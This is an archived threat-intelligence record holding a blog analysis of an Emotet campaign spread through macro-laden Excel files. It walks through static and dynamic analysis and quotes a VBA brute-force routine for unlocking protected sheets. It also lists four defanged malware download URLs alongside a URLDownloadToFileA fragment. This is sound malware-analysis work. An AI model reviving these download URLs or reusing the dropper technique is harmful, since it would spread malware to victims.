{
	"id": "ee5aa3f8-a96c-4940-bda5-20c83c3d82b9",
	"created_at": "2026-04-06T00:16:16.405531Z",
	"updated_at": "2026-04-10T03:21:25.845865Z",
	"deleted_at": null,
	"sha1_hash": "4737584885ebcaa363559fae14e74d65a201e864",
	"title": "Emotet Campaign:",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3361144,
	"plain_text": "Emotet Campaign:\r\nBy Ilan Duhin\r\nPublished: 2023-02-28 · Archived: 2026-04-05 21:08:32 UTC\r\nExecutive Summary:\r\n5 min read\r\nFeb 26, 2023\r\nIn recent months there has been an extensive campaign in Europe, mainly of a malware called “Emotet”.\r\nThe malware arrives as an Excel file, tries to communicate with a number of URLs and finally downloads four DLL files to the machine.\r\nEmotet uses the CreateDirectoryA API call to create a folder where the files are saved locally on the computer; from there they are run through Regsvr32.exe.\r\nEmotet Behavior\r\nStatic Analysis:\r\nOLE Tools:\r\nhttps://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5\r\nPage 1 of 15\r\nChecking the file structure.\r\nThis gives a first clue that the Excel file contains 6 sheets.\r\nChecking the capabilities of the file with malwoverview.py gives some further clues.\r\nGo into the third stream and extract its strings.\r\nWe find 4 suspicious URLs.\r\nThe file contains a macro. In addition, we find all the cells that contain the whole code.\r\nDynamic Analysis:\r\nFirst, we tried to open the Excel file (part of Office 2021) and noticed that it opened without the “Enable Content” pop-up. After doing a little research, the message shows only on the 2007–2013 versions of Office.\r\nSince then, Microsoft blocks the option of enabling macros to run automatically.\r\nTo enable macros we need to change the option as in the picture below:\r\n** In Office 2007/2013 it will run by clicking “Enable Content”.\r\nWe need to save the file and open it again in Excel.\r\nAnd now…\r\nWhen we press the button, four messages pop up.\r\nChild processes of Excel.\r\nWhen clicking on regsvr32.exe you can see the macros using it to execute the malware. It acts like a dropper because it generates a folder to place its DLL in.\r\nWhen opening Excel and following up on the static investigation, we see the 6 sheets that were hidden from the victim.\r\nEach sheet requires a password.\r\nTo extract the password, we use “password breaker for VBA”.\r\nSource: https://www.instructables.com/VBA-Code-To-Unlock-A-Locked-Excel-Sheet/\r\nSub PasswordBreaker()\r\n'Breaks worksheet password protection.\r\nDim i As Integer, j As Integer, k As Integer\r\nDim l As Integer, m As Integer, n As Integer\r\nDim i1 As Integer, i2 As Integer, i3 As Integer\r\nDim i4 As Integer, i5 As Integer, i6 As Integer\r\nOn Error Resume Next\r\nFor i = 65 To 66: For j = 65 To 66: For k = 65 To 66\r\nFor l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66\r\nFor i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66\r\nFor i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126\r\nActiveSheet.Unprotect Chr(i) \u0026 Chr(j) \u0026 Chr(k) \u0026 _\r\nChr(l) \u0026 Chr(m) \u0026 Chr(i1) \u0026 Chr(i2) \u0026 Chr(i3) \u0026 _\r\nChr(i4) \u0026 Chr(i5) \u0026 Chr(i6) \u0026 Chr(n)\r\nIf ActiveSheet.ProtectContents = False Then\r\nMsgBox \"One usable password is \" \u0026 Chr(i) \u0026 Chr(j) \u0026 _\r\nChr(k) \u0026 Chr(l) \u0026 Chr(m) \u0026 Chr(i1) \u0026 Chr(i2) \u0026 _\r\nChr(i3) \u0026 Chr(i4) \u0026 Chr(i5) \u0026 Chr(i6) \u0026 Chr(n)\r\nExit Sub\r\nEnd If\r\nNext: Next: Next: Next: Next: Next\r\nNext: Next: Next: Next: Next: Next\r\nEnd Sub\r\nTo insert our VBA code we press ALT+F11, paste it and run it.\r\nWe paste the password breaker inside every sheet.\r\nExcel automatically shows us the password for the requested sheet.\r\nWe can verify it by right-clicking and seeing that the sheet is “Protected”.\r\nSheet 1 data:\r\nSheet 2 data:\r\nWhen we reorganize the strings we see four URLs:\r\n- URLDownloadToFileA”, “JCCB”, 0, “https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc\r\n- https://geringer-muehle.[de]/wp-admin/G/\r\n- http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/\r\n- http://isc.net.[ua]/themes/3rU/\r\nSheet 3 data:\r\nSheet 4 data:\r\nAnother two URLs that we saw earlier.\r\nSheet 5 data:\r\nSheet 6 data:\r\nContains the instructions for how to put the strings together.\r\nDLL Analysis:\r\nExport function number 18.\r\nAfter running the DLL we found a few interesting strings in the memory tab.\r\nIn addition, upon execution it drops itself to the following path:\r\nWhen analyzing the memory strings of the DLL in VT we got a description of Emotet.\r\nConclusions:\r\n· The macros reach out to download \u0026 execute the Emotet malware.\r\n· The Excel file uses macros to reach out to web URLs.\r\n· Emotet performs its execution via regsvr32.exe.\r\n· The Emotet dropper is downloaded to a randomly generated folder under %UserProfile%\\Appdata\\Local as a DLL file.\r\nSource: https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5"
	],
	"report_names": [
		"emotet-campaign-6f240f7a5ed5"
	],
	"threat_actors": [],
	"ts_created_at": 1775434576,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4737584885ebcaa363559fae14e74d65a201e864.pdf",
		"text": "https://archive.orkl.eu/4737584885ebcaa363559fae14e74d65a201e864.txt",
		"img": "https://archive.orkl.eu/4737584885ebcaa363559fae14e74d65a201e864.jpg"
	}
}